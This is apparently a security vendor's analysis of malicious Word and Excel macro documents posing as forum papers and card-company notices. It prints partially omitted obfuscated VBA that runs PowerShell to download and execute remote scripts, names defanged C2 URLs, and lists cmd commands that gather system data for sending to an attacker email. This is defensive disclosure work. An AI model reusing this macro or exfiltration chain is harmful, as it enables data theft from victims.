Malware Disguised as Normal Excel and Word Documents

The ASEC analysis team has recently confirmed that document files with a certain type of malicious macro have been distributed continuously. The malicious files are distributed with various filenames as shown below. As they all contain content disguised as normal files, users must exercise caution when dealing with them.

  • Constitution Day International Academic Forum.doc
  • 28th North Korea-South Korea Relations Experts Discussion***.doc
  • Honorarium Template.doc
  • email_20210516.xls
  • email_20210414.xls

Recently discovered excel files contain the date of distribution on their filenames such as ’email_20210516.xls’ and urge users to enable macro. Also, the attackers added information about domestic card companies at the bottom of pages to disguise the files as document sent by those companies.

When users click Enable Content, a window for entering mail confirmation number appears, making the file look like a normal document. It requests users to enter their date of birth in a 6-digit number. If a 6-digit is not entered, a popup appears.

After the 6-digit number is entered, the following sheet hidden inside the file appears. For this sheet, the attacker used the information of a bank instead of the impersonated card company above.

Upon entering password

The malicious macro existing in the excel file is automatically run when users enable macros. The macro is a powershell command that connects to hxxp://manstr.myartsonline.com/pc/kj.txt to download and run additional scripts.

Process tree upon running macro

The word file which has the same malicious macro as that of the excel file shown above was distributed with the filename of ‘Constitution Day International Academic Forum.doc.’ It contains an image urging users to enable macro.

Upon clicking Enable Content, the file shows a normal-looking document.

As shown below, the word file uses a similar macro code to that found in the excel file. The variable names and formats used in macro codes are the same. When the macro is run, it connects to hxxp://rukagu.mypressonline.com/le/yj.txt to download and run additional scripts.

Private Sub Workbook_Open()
Sheets(“Sheet1”).Select
Sheets(“Sheet2”).Visible = True
Sheets(“Sheet1”).Visible = False
eifhhdfasfiedf
End Sub

Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject(“Shell.Application”)
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
dfgdfjiejfjdshaj = “+e+z+p+e+z+o+e+z+w+e+z+e+e+z+r+e+z+s+e+z+h+e+z+e+e+z+l+e+z+l+e+z+.+e+z+e+e+z+x+e+z+e+e+z+”
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, “+e+z+”, “”)
yhjhfjdhfdhfuesk(0) = “+e+z+[+e+z+s+e+z+t+e+z+r+e+z+i+e+z+n+e+z+g+e+z+]+e+z+$+e+z+a+e+z+=+e+z+{+e+z+(+e+z+N+e+z+”
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), “+e+z+”, “”)
yhjhfjdhfdhfuesk(1) = “+e+z+e+e+z+w+e+z+-+e+z+O+e+z+b+e+z+j+e+z+e+e+z+c+e+z+t +e+z+N+e+z+e+e+z+t+e+z+.+e+z+W+e+z+e+e+z+b+e+z+C+e+z+l+e+z+i+e+z+”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), “+e+z+”, “”)
<omitted>
yhjhfjdhfdhfuesk(6) = “+e+z+l+e+z+o+e+z+a+e+z+d+e+z+S+e+z+t+e+z+r+e+z+’+e+z+)+e+z+;+e+z+$+e+z+c+e+z+=+e+z+i+e+z+e+e+z+x+e+z+ +e+z+$+e+z+b+e+z+;+e+z+i+e+z+e+e+z+x +e+z+$+e+z+c+e+z+”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(6), “+e+z+”, “”)
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, “”, “open”, 0
End Function
Private Sub Document_Open()
asfwefsadfasfsadf
asfwqfasfsdafas
sdfqefsdafsadfwqefsadf
eifhhdfasfiedf
End Sub
 <omitted>
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject(“Shell.Application”)
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
dfgdfjiejfjdshaj = “tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn”
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, “tuwhn”, “”)
yhjhfjdhfdhfuesk(0) = “tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn “
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), “tuwhn”, “”)
yhjhfjdhfdhfuesk(1) = “tuwhnNtuwhnetuwhnttuwhn.tuwhnWtuwhnetuwhnbtuwhnCtuwhnltuwhnituwhnetuwhnntuwhnttuwhn)tuwhn.tuwhnDtuwhnntuwhngtuwhn”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), “tuwhn”, “”)
<omitted>
yhjhfjdhfdhfuesk(5) = “etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), “tuwhn”, “”)
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, “”, “open”, 0
End Function
Excel macro code / Word macro code


The same attacker likely distributed both excel and word files as each downloads a script from each C2 which performs the exact same behaviors of leaking user information, downloading additional scripts, etc. The following shows the script confirmed in C2 (hxxp://warms.atwebpages.com/rh/ee.txt) connected from a distributed file with the filename of Honorarium Template.doc.

Script confirmed in C2

Its features include uploading user PC information and downloading additional files. The script collects information of the list shown below, saving the collected data in the %APPDATA%\Ahnlab\Ahnlab.hwp file and uploading it to hxxp://warms.atwebpages.com/rh/post.php.

  • Recent Files
  • Program Files (x86) Files and Folders
  • systeminfo Information
  • tasklist Information
Created log file

Then it downloads a specific string from the hxxp://warms.atwebpages.com/rh/ee.down URL, decodes it, and runs it in the background through the Start-Job –ScriptBlock command. Also, it attempts to create registry with the name of Alzipupdate in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, but the data is not normally registered.

The team could not confirmed what the code does afterward because the downloaded URL is inaccessible. However, a malicious script was additionally discovered in the same domain. The following shows the additional script found in hxxp://warms.atwebpages.com/rh/hollow64.txt.

Additionally found script

The script, after running %windir%\SysWOW64\cmd.exe, downloads the data shown below from hxxp://warms.atwebpages.com/rh/baymax[numbers].txt and injects it into the process that was executed earlier to perform malicious behaviors.

Additionally downloaded malicious data

The malicious PE injected to cmd.exe saves the data inside the directory that contains most recently used document files, data inside the Program Files directory, and systeminfo information to %APPDATA%\Microsoft\Network\Alzip and sends them to wariii.mypressonline[.]com/home/jpg/downpost.php. It then downloads additional malicious files from hxxp://wariii.mypressonline.com/home/jpg/downdownload.php?filename=baymax[numbers] and runs it after saving as %APPDATA%\Microsoft\Network\Alzip.dll.

The downloaded Alzip.dll file injects a malicious PE to svchost.exe and runs %APPDATA%\pagefile.sys after creating it. The pagefile.sys that is ultimately run performs the feature of collecting user information and sending it to e-mail.

pagefile.sys property

When the pagefile.sys is executed, it replicates itself as %AppData%\OneDriver\down\hancom.dll and checks registries such as SOFTWARE\\VMware, Inc.\\Vmware Tools or SYSTEM\\CurrentControlSet\\Control\\VirtualDeviceDrivers. If the registry exists in the operating environment, the file terminates its execution. Then it performs the cmd.exe /c taskkill /f /im daumcleaner.exe command to terminate daumcleaner.exe and then registers hancom.dll to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dropbox.

Created Registry

Also, it performs the following command to save the collected information to %AppData%\OneDriver\out\PI_001.dat and then sends it to Flower9801@hanmail[.]net.

-cmd.exe /c ipconfig/all >>”%AppData%\OneDriver\out\PI_001.dat” & arp -a >”%AppData%\OneDriver\out\PI_001.dat”
-cmd.exe /c systeminfo >>”%AppData%\OneDriver\out\PI_001.dat”
-cmd.exe /c tasklist >>”%AppData%\OneDriver\out\PI_001.dat”
List of execution commands

Besides the two files explained earlier, the files with different filenames were not collected. But as both of them are using the same macro code, others are likely to perform the same malicious behaviors shown above.

Malicious document files containing normal content have been steadily distributed since the past. Because they show different screens after running malicious macros, it is difficult for users to acknowledge that these files are malicious. Users should take caution when files urge them to use macros and refrain from opening files with unknown sources.

AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.

[File Detection]
Downloader/DOC.Generic
Downloader/XLS.Agent
Trojan/Win.Agent.C4480883
Trojan/Win.Agent.C4408018

[IOC Info]
1269e2b00fd323a7748215124cb058cd
811f8c88cda9e8c4f448aa6f380e5a93
e61aafd8d7065a2fa8d5a343098b98cb
0629fd238259d7df7aa22ca82ac6b93e
hxxp://warms.atwebpages.com
hxxp://rukagu.mypressonline.com
hxxp://manstr.myartsonline.com
hxxp://wariii.mypressonline.com

Categories:Malware Information

5 1 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments